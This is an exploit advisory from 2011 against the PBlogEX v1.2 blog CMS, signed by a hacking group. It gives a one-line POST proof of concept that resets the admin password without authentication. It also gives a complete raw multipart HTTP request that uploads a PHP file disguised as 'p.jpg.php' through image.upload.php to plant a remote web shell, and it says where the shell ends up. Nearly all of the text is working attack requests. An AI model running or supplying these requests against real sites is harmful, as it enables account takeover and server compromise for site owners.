# PBlogEX v1.2 Multiply Vulnerabilities # vendor: http://www.twelvedev.com/ # By l3lack_lord # WwW.Mokhareb.NeT # Demo: http://f-ochoa.com/ # Tested On: Apache/2.2.9 - PHP/5.2.6 # Date: 2011/03/4 # Des: # The Admin Password Change Not Authoritated for execute # POC: http://Site.com/PBlogEX/admin/admin.password.php [POST]user=1&password=l3lack_lord Now Password Will change to l3lack_lord http://Site.com/PBlogEX/admin u should gess admin user :) ################################################################# # Des: # Remote Shell uplode possible on this cms with no authetication in image.upload.php # POC: http://Site.com/PBlogEX/admin/image.upload.php [POST] Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://Site.com/PBlogEX/admin/admin.php Content-Type: multipart/form-data; boundary=---------------------------225932708016080 Content-Length: 5775 -----------------------------225932708016080\r\n Content-Disposition: form-data; name="filephoto"; filename="p.jpg.php"\r\n Content-Type: image/jpeg\r\n \r\n \r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="titlephoto"\r\n \r\n aaa\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="descphoto"\r\n \r\n aaa\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="Default1"\r\n \r\n on\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="0"\r\n \r\n f\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="1"\r\n \r\n i\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="2"\r\n \r\n l\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="3"\r\n \r\n e\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="4"\r\n \r\n p\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="5"\r\n \r\n h\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="6"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="7"\r\n \r\n t\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="8"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="9"\r\n \r\n =\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="10"\r\n \r\n p\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="11"\r\n \r\n .\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="12"\r\n \r\n j\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="13"\r\n \r\n p\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="14"\r\n \r\n g\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="15"\r\n \r\n &\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="16"\r\n \r\n t\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="17"\r\n \r\n i\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="18"\r\n \r\n t\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="19"\r\n \r\n l\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="20"\r\n \r\n e\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="21"\r\n \r\n p\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="22"\r\n \r\n h\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="23"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="24"\r\n \r\n t\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="25"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="26"\r\n \r\n =\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="27"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="28"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="29"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="30"\r\n \r\n &\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="31"\r\n \r\n d\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="32"\r\n \r\n e\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="33"\r\n \r\n s\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="34"\r\n \r\n c\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="35"\r\n \r\n p\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="36"\r\n \r\n h\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="37"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="38"\r\n \r\n t\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="39"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="40"\r\n \r\n =\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="41"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="42"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="43"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="44"\r\n \r\n &\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="45"\r\n \r\n D\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="46"\r\n \r\n e\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="47"\r\n \r\n f\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="48"\r\n \r\n a\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="49"\r\n \r\n u\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="50"\r\n \r\n l\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="51"\r\n \r\n t\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="52"\r\n \r\n 1\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="53"\r\n \r\n =\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="54"\r\n \r\n o\r\n -----------------------------225932708016080\r\n Content-Disposition: form-data; name="55"\r\n \r\n n\r\n -----------------------------225932708016080--\r\n copy file name in error that will print..like 2011-03-02_7032_p.jpg.php Shell Path : http://Site.com/PBlogEX/images/2011-03-02_7032_p.jpg.php # Virangar Security Team , DeltaHacking TEam , Aria-Security # tnX t0 mY cronies Hares And Netw0rm :-*